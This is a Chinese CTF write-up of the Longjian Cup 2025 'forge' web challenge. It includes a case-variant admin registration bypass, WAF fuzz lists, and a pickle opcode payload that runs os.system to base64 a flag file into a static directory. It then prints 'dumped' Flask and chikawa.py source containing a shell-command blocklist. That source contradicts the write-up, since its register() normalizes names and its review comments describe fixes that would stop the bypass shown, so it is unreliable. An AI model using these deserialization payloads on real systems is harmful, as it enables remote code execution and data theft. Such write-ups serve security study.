目录

  1. 1. 前言
  2. 2. forge

LOADING

第一次加载文章图片可能会花费较长时间

要不挂个梯子试试?(x

加载过慢请开启缓存 浏览器默认开启

陇剑杯2025

2025/9/6 CTF线上赛
  |     |   总文章阅读量:

前言

黑盒 pickle 是坏文明!


forge

只有注册和登录两个路由,其中登录处 only admin can login

但是注册能正常注册用户

login 处有过滤,fuzz 得到

可用: ['SELECT', 'UNION', 'WHERE', 'limit', 'group', 'by', 'like', 'prepare', 'as', 'if', 'sleep', 'char', 'ascii', 'mid', 'left', 'right', 'substring', 'updatexml', 'extractvalue', 'benchmark', 'insert', 'update', 'all', '@', '^', '&', "'", '"', '~', '`', '(', ')', '=', '\\', 'database', 'column', "'1'='1", 'count', 'concat', 'cot', 'replace', '.']
不可用: ['select', 'union', 'union select', 'and', 'or', '||', 'where', 'from', 'order', 'ORDER', 'handler', '#', '*', '--', '/', ' ', 'information_schema', ';', 'rand', 'floor']

一时半会想不到绕过的方法

尝试注册 admin 账户,返回 no access, try bypass,猜测是逻辑绕过

尝试在 /register 大小写绕过注册

POST /register HTTP/1.1
Host: web-2803794189.challenge.longjiancup.cn
Accept-Encoding: gzip, deflate
Referer: http://web-67b31d46ab.challenge.longjiancup.cn/register
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Cache-Control: max-age=0
Origin: http://web-67b31d46ab.challenge.longjiancup.cn
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
Content-Length: 30

username=aDmiN&password=123

然后就发现能登录了

接下来是文件上传打 pickle,先下载 example.pkl 拿 pickletools 看看格式

    0: \x80 PROTO      4
    2: \x95 FRAME      112
   11: \x8c SHORT_BINUNICODE '__main__'
   21: \x94 MEMOIZE    (as 0)
   22: \x8c SHORT_BINUNICODE 'CHIKAWA'
   31: \x94 MEMOIZE    (as 1)
   32: \x93 STACK_GLOBAL
   33: \x94 MEMOIZE    (as 2)
   34: )    EMPTY_TUPLE
   35: \x81 NEWOBJ
   36: \x94 MEMOIZE    (as 3)
   37: }    EMPTY_DICT
   38: \x94 MEMOIZE    (as 4)
   39: (    MARK
   40: \x8c     SHORT_BINUNICODE 'model_name'
   52: \x94     MEMOIZE    (as 5)
   53: \x8c     SHORT_BINUNICODE 'Example'
   62: \x94     MEMOIZE    (as 6)
   63: \x8c     SHORT_BINUNICODE 'data'
   69: \x94     MEMOIZE    (as 7)
   70: C        SHORT_BINBYTES b"cbuiltins\nprint\n(S'chikawa'\ntR."
  103: \x94     MEMOIZE    (as 8)
  104: \x8c     SHORT_BINUNICODE 'parameters'
  116: \x94     MEMOIZE    (as 9)
  117: \x8c     SHORT_BINUNICODE ''
  119: \x94     MEMOIZE    (as 10)
  120: u        SETITEMS   (MARK at 39)
  121: b    BUILD
  122: .    STOP
highest protocol among opcodes = 4

执行返回 module_name Example, None

可见我们需要修改其中的 data 部分,打入我们的 opcode

接下来就是测 waf,测了一个多小时才发现 waf 的是命令执行不是 pickle。。。

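另一个坑是这里用 ca\\t 读取会返回 32512(即 127 << 8,也就是 os.system 返回的等待状态,对应 shell 退出码 127:command not found;推测是 pickle 的 S 操作码把 \t 解码成了制表符,实际执行的命令变成了 ca),正常的话会返回 module_name Example,0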

于是执行结果写入 static 下静态文件带外

import pickle

# Empty stand-in for the server-side model class; only its name and the
# attributes assigned below end up in the pickle.
class CHIKAWA:
    pass

# Text-protocol pickle opcodes that are stored as the model's ``data``
# attribute. The embedded shell command redirects its output to
# /app/static/4.txt.
opcode=b'''cos
system
p0
0g0
(S'bas\\e64 /f??? -w 0 >/app/static/4.txt'
tR.'''

# Fill in the same three attributes that example.pkl carries
# (model_name, data, parameters).
obj = CHIKAWA()
obj.model_name = 'Example'
obj.data = opcode
obj.parameters = ''
# Serialize the wrapper object to 1.pkl.
with open('1.pkl', 'wb') as f:
    f.write(pickle.dumps(obj))

dump 下来的源码:

app.py

from flask import Flask, render_template, request, redirect, url_for, session, flash
from werkzeug.security import generate_password_hash, check_password_hash
from werkzeug.utils import secure_filename
import sqlite3
import os
from datetime import datetime
import pickle, time, sys, re
from chikawa import CHIKAWA
import unicodedata

from flask import send_from_directory
app = Flask(__name__)
# Also expose CHIKAWA as an attribute of the ``__main__`` module, so that
# pickles referencing ``__main__.CHIKAWA`` can be resolved.
sys.modules['__main__'].CHIKAWA = CHIKAWA
# NOTE(review): placeholder session key committed in source — presumably meant
# to be replaced per deployment; confirm.
app.secret_key = 'your_secret_key_here'
app.config['UPLOAD_FOLDER'] = 'uploads'  # directory that receives uploaded files
app.config['DATABASE'] = 'database.db'  # SQLite database file
app.config['ALLOWED_EXTENSIONS'] = {'pkl'}  # extensions accepted by allowed_file()

# Create the upload directory at import time if it does not exist yet.
os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)


def prepare(node: str) -> str:
    """Return the canonical form of a user-supplied name.

    The value is NFKC-normalized, lower-cased and stripped of surrounding
    whitespace, in that order. ``None`` is passed through unchanged.
    """
    if node is None:
        return None
    return unicodedata.normalize("NFKC", node).lower().strip()

def init_db():
    """Create the ``users`` and ``models`` tables if they do not exist yet.

    Runs inside the Flask application context. The connection is closed in a
    ``finally`` block so it is released even when a statement fails.
    """
    with app.app_context():
        conn = sqlite3.connect(app.config['DATABASE'])
        try:
            cursor = conn.cursor()
            cursor.execute('''
                CREATE TABLE IF NOT EXISTS users (
                    id INTEGER PRIMARY KEY AUTOINCREMENT,
                    username TEXT UNIQUE NOT NULL,
                    password TEXT NOT NULL
                )
            ''')
            cursor.execute('''
                CREATE TABLE IF NOT EXISTS models (
                    id INTEGER PRIMARY KEY AUTOINCREMENT,
                    user_id INTEGER NOT NULL,
                    filename TEXT NOT NULL,
                    upload_time DATETIME NOT NULL,
                    FOREIGN KEY (user_id) REFERENCES users (id)
                )
            ''')
            conn.commit()
        finally:
            conn.close()


# Make sure the schema exists as soon as the module is imported.
init_db()
def get_db():
    """Open and return a new SQLite connection to the configured database."""
    database_path = app.config['DATABASE']
    return sqlite3.connect(database_path)
def login_required(f):
    """Decorate a view so it is only run when the session has a ``user_id``.

    Requests without ``user_id`` in the session are redirected to the
    ``login`` endpoint instead of reaching the wrapped view.
    """
    from functools import wraps

    @wraps(f)
    def guarded_view(*args, **kwargs):
        if 'user_id' in session:
            return f(*args, **kwargs)
        return redirect(url_for('login'))

    return guarded_view

def allowed_file(filename):
    """Return True when *filename* has a dot and an allowed extension.

    The extension is the text after the last dot, compared case-insensitively
    against ``app.config['ALLOWED_EXTENSIONS']``.
    """
    _stem, dot, extension = filename.rpartition('.')
    return dot == '.' and extension.lower() in app.config['ALLOWED_EXTENSIONS']
@app.route('/')
def index():
    """Redirect the site root to the login page."""
    login_url = url_for('login')
    return redirect(login_url)
def waf(data):
    """Return True when *data* matches any of the blocked input patterns.

    The patterns are tried in order with ``re.search``; only the second one
    is case-insensitive.
    """
    blocked_patterns = (
        r'/\*.*\*/',
        r'(?i)(and|or|\&\&|\|\|)',
        r'[\s\+\-\*\/]',
        r'union|select|from|where',
        r';|--|#',
    )
    return any(re.search(rule, data) for rule in blocked_patterns)

@app.route('/login', methods=['GET', 'POST'])
def login():
    """Render the login form and, on POST, authenticate the admin user.

    A POST is rejected with a flash message when the normalized username is
    not ``admin`` or when either field trips ``waf``. Otherwise the user row
    is looked up and the password hash is verified; on success ``user_id`` is
    stored in the session and the client is redirected to the panel.
    """
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']

        # prepare() NFKC-normalizes, lower-cases and strips the value, so one
        # comparison against the canonical spelling covers every variant.
        if prepare(username) != "admin":
            flash("only admin can login")
            return redirect(request.url)

        if waf(username) or waf(password):
            flash('Invalid input detected')
            return redirect(request.url)

        conn = get_db()
        try:
            cursor = conn.cursor()
            # NOTE(review): the lookup uses the raw submitted username while
            # register() stores the normalized one — confirm this is intended.
            cursor.execute('SELECT * FROM users WHERE username = ?', (username,))
            user = cursor.fetchone()
        finally:
            # Release the connection even if the query raises.
            conn.close()

        # Row layout is (id, username, password hash).
        if user and check_password_hash(user[2], password):
            session['user_id'] = user[0]
            return redirect(url_for('panel'))
        else:
            flash('Invalid username or password')
    return render_template('login.html')
@app.route('/register', methods=['GET', 'POST'])
def register():
    """Render the registration form and, on POST, create a user.

    The username is normalized with ``prepare`` before the reserved-name
    check, so the check is applied to exactly the value that gets stored.
    Duplicate usernames are reported with a flash message.
    """
    if request.method == 'POST':
        username = request.form['username']
        password = generate_password_hash(request.form['password'])

        # Check the normalized name: comparing the raw input let case and
        # Unicode variants of the reserved name through, which were then
        # stored as "admin".
        # NOTE(review): with this enforced, the admin account has to be
        # created some other way — confirm how it is provisioned.
        name = prepare(username)
        if name == "admin":
            flash("no access, try bypass")
            return redirect(request.url)

        conn = get_db()
        try:
            cursor = conn.cursor()
            cursor.execute('INSERT INTO users (username, password) VALUES (?, ?)', (name, password))
            conn.commit()
        except sqlite3.IntegrityError:
            # The UNIQUE constraint on username was violated.
            flash('Username already exists')
        else:
            return redirect(url_for('login'))
        finally:
            # Runs on every path, including the redirect above.
            conn.close()
    return render_template('register.html')
@app.route('/panel')
@login_required
def panel():
    """Render the panel page for a logged-in user."""
    page = render_template('panel.html')
    return page
@app.route('/upload', methods=['GET', 'POST'])
@login_required
def upload():
    """Render the upload form and, on POST, store an uploaded ``.pkl`` file.

    The file is saved under the upload folder using its sanitized name and a
    row is added to ``models`` for the current session user. The extension is
    checked both before and after sanitizing.
    """
    if request.method == 'POST':
        if 'file' not in request.files:
            flash('No file selected')
            return redirect(request.url)
        file = request.files['file']
        if file.filename == '':
            flash('No selected file')
            return redirect(request.url)
        if not (file and allowed_file(file.filename)):
            flash('Only .pkl files are allowed')
            return render_template('upload.html')

        filename = secure_filename(file.filename)
        # Sanitizing can change the name (for example by stripping a leading
        # dot), so make sure what is written to disk still has an allowed
        # extension.
        if not allowed_file(filename):
            flash('Only .pkl files are allowed')
            return render_template('upload.html')

        save_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
        file.save(save_path)
        conn = get_db()
        try:
            cursor = conn.cursor()
            cursor.execute('''
                INSERT INTO models (user_id, filename, upload_time)
                VALUES (?, ?, ?)
            ''', (session['user_id'], filename, datetime.now()))
            conn.commit()
        finally:
            # Release the connection even if the insert fails.
            conn.close()
        flash('File uploaded successfully')
        return redirect(url_for('model'))
    return render_template('upload.html')

@app.route('/model')
@login_required
def model():
    """Render the model list, newest upload first.

    Every row of ``models`` is listed, regardless of which user uploaded it.
    """
    conn = get_db()
    try:
        cursor = conn.cursor()
        cursor.execute('''
            SELECT id, filename, upload_time, user_id
            FROM models
            ORDER BY upload_time DESC
        ''')
        models = cursor.fetchall()
    finally:
        # Release the connection even if the query raises.
        conn.close()
    return render_template('model.html', models=models)



@app.route('/execute/<int:model_id>', methods=['POST'])
@login_required
def execute(model_id):
    """Load the stored model with id *model_id* and run ``CHIKAWA.train`` on it.

    Returns a plain-text result on success, a ``wrong data ...`` string when
    loading or training raises, and otherwise redirects to the model list.
    """
    conn = get_db()
    try:
        cursor = conn.cursor()
        cursor.execute('SELECT filename FROM models WHERE id = ?', (model_id,))
        file_record = cursor.fetchone()
    finally:
        # Release the connection even if the query raises.
        conn.close()

    if file_record:
        file_path = os.path.join(app.config['UPLOAD_FOLDER'], file_record[0])
        if os.path.exists(file_path):
            try:
                # SECURITY: this deserializes user-uploaded pickle data, and
                # CHIKAWA.train() unpickles the embedded ``data`` again.
                # Treat it as code execution on untrusted input.
                loaded = CHIKAWA.load_model(file_path)
                train_result = CHIKAWA.train(loaded.data)
                return f"module_name {loaded.model_name}, {train_result}"
            except Exception as e:
                return f"wrong data {e}"
        else:
            flash('File not found.')
    return redirect(url_for('model'))


@app.route('/download/<int:model_id>', methods=['GET'])
@login_required
def download(model_id):
    """Send the stored file for *model_id* as an attachment.

    Redirects to the model list when the id is unknown or the file is no
    longer on disk (the latter also flashes a message).
    """
    conn = get_db()
    try:
        cursor = conn.cursor()
        cursor.execute('SELECT filename FROM models WHERE id = ?', (model_id,))
        file_record = cursor.fetchone()
    finally:
        # Release the connection even if the query raises.
        conn.close()

    if file_record:
        file_path = os.path.join(app.config['UPLOAD_FOLDER'], file_record[0])
        if os.path.exists(file_path):
            return send_from_directory(app.config['UPLOAD_FOLDER'], file_record[0], as_attachment=True)
        else:
            flash('File not found.')

    return redirect(url_for('model'))

@app.route('/delete/<int:model_id>', methods=['POST'])
@login_required
def delete(model_id):
    """Delete the model *model_id* if it belongs to the current session user.

    Removes the file from the upload folder (when present) and the matching
    row from ``models``, then redirects to the model list.
    """
    conn = get_db()
    try:
        cursor = conn.cursor()
        cursor.execute('SELECT filename FROM models WHERE id = ? AND user_id = ?',
                       (model_id, session['user_id']))
        file_record = cursor.fetchone()
        if file_record:
            file_path = os.path.join(app.config['UPLOAD_FOLDER'], file_record[0])
            try:
                os.remove(file_path)
            except FileNotFoundError:
                # Already gone; the database row is still cleaned up below.
                pass
            cursor.execute('DELETE FROM models WHERE id = ?', (model_id,))
            conn.commit()
    finally:
        # Release the connection even if a statement or the removal raises.
        conn.close()
    return redirect(url_for('model'))
# Start Flask's built-in server only when this file is run as a script.
if __name__ == '__main__':
    # Listen on all interfaces, port 8000, with debug mode off.
    app.run(debug=False, host="0.0.0.0", port=8000)

chikawa.py

import builtins
import io
import pickle
import hashlib
import hmac
# Names from ``builtins`` that a pickle is allowed to reference.
safe_builtins = {
    'range',
    'complex',
    'set',
    'frozenset',
    'slice',
}
# Class names that may be resolved from the ``__main__`` module.
ALLOWED_MODEL_CLASSES = {'CHIKAWA'}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that only resolves an explicit allow-list of globals."""

    def find_class(self, module, name):
        """Resolve ``module.name`` if it is allow-listed.

        Allowed globals are ``chikawa.CHIKAWA``, the builtins listed in
        ``safe_builtins``, and the names in ``ALLOWED_MODEL_CLASSES`` when
        referenced through ``__main__``.

        Raises:
            pickle.UnpicklingError: for every other global.
        """
        if module == "chikawa" and name == "CHIKAWA":
            from chikawa import CHIKAWA
            return CHIKAWA
        if module == "builtins" and name in safe_builtins:
            return getattr(builtins, name)
        # Both conditions must hold. With ``or`` every attribute of
        # ``__main__`` and any module exposing an allow-listed name were
        # accepted.
        if module == "__main__" and name in ALLOWED_MODEL_CLASSES:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")
def restricted_loads(s, secret_key=None):
    """Unpickle *s* with ``RestrictedUnpickler``, optionally verifying an HMAC.

    Args:
        s: Pickle bytes. When *secret_key* is given, *s* must have the form
            ``<pickle bytes> + b'::' + <raw HMAC-SHA256 digest>``.
        secret_key: HMAC key, or ``None`` to skip verification.

    Returns:
        The object produced by the restricted unpickler.

    Raises:
        pickle.UnpicklingError: if the trailer is malformed, the digest does
            not match, or the pickle references a forbidden global.
    """
    if secret_key is not None:
        try:
            separator = b'::'
            digest_size = hashlib.sha256().digest_size
            trailer_size = len(separator) + digest_size
            # Both the pickle bytes and a raw digest can contain b'::', so
            # take the fixed-size trailer from the end instead of splitting
            # on the separator.
            if len(s) < trailer_size or s[-trailer_size:-digest_size] != separator:
                raise ValueError("missing '::' separator before the digest")
            data = s[:-trailer_size]
            received_digest = s[-digest_size:]
            computed_digest = hmac.new(secret_key, data, hashlib.sha256).digest()
            if not hmac.compare_digest(computed_digest, received_digest):
                raise pickle.UnpicklingError("HMAC verification failed")
        except Exception as e:
            raise pickle.UnpicklingError(f"HMAC verification error: {str(e)}") from e
    else:
        data = s
    return RestrictedUnpickler(io.BytesIO(data)).load()
class CHIKAWA:
    """Model container holding a name, a data blob and a parameter dict."""

    def __init__(self, model_name, data, parameters):
        """Store the fields and validate them.

        Args:
            model_name: Name of the model; must be a ``str``.
            data: Payload later passed to ``train``.
            parameters: Parameter dict; a falsy value becomes ``{}``.

        Raises:
            ValueError: if ``model_name`` is not a string or ``parameters``
                is not a dictionary.
        """
        self.model_name = model_name
        self.data = data
        self.parameters = parameters or {}
        self._validate_parameters()

    def _validate_parameters(self):
        """Raise ``ValueError`` when ``model_name`` or ``parameters`` has the wrong type."""
        if not isinstance(self.model_name, str):
            raise ValueError("model_name must be a string")
        if not isinstance(self.parameters, dict):
            raise ValueError("parameters must be a dictionary")

    @staticmethod
    def train(data):
        """Unpickle *data* unless it contains a forbidden byte sequence.

        Declared as a static method because it takes no instance; calling it
        as ``CHIKAWA.train(data)`` keeps working.

        Returns:
            ``"Hacker!"`` when a forbidden token is present, the unpickled
            object on success, or an error string when unpickling raises.
        """
        import pickle
        forbidden = [b"bash", b"flag", b"tac", b"cat", b"ls", b"sh", b"whoami", b"curl", b"wget", b"rm", b"echo", b"chmod", b"chown", b"scp", b"ssh", b"ftp", b"nc", b"netcat", b"telnet", b"python", b"perl", b"ruby", b"java", b"php", b"javascript", b"node", b"exec", b"eval", b"import", b"subprocess", b"*", b"fl", b"fla", b"env", b"proc", b"\\x"]
        if any(f in data for f in forbidden):
            return "Hacker!"
        try:
            # SECURITY: plain pickle.loads resolves arbitrary globals, and the
            # substring filter above does not stop that. Never feed this
            # untrusted bytes.
            models = pickle.loads(data)
            return models
        except pickle.UnpicklingError as e:
            return f"error: {e}"
        except Exception as e:
            return f"{e}"

    def predict(self, input_text):
        """Return ``"<model_name>: <reversed input>"`` once the model is trained.

        The model counts as trained when ``parameters["trained"]`` is truthy;
        otherwise a fixed "not trained" message is returned.

        Raises:
            ValueError: if *input_text* is not a string.
        """
        if not isinstance(input_text, str):
            raise ValueError("Input must be a string")
        if self.parameters.get("trained", False):
            return f"{self.model_name}: {input_text[::-1]}"
        return "Model not trained yet."

    @staticmethod
    def load_model(filename, secret_key=None):
        """Read *filename* and unpickle its contents via ``restricted_loads``."""
        with open(filename, "rb") as f:
            data = f.read()
        return restricted_loads(data, secret_key)

    def __reduce__(self):
        """Describe how to rebuild this object when pickling.

        All three ``__init__`` arguments are included; omitting ``data``
        makes reconstruction fail with a missing-argument ``TypeError``.
        """
        return (self.__class__, (self.model_name, self.data, self.parameters))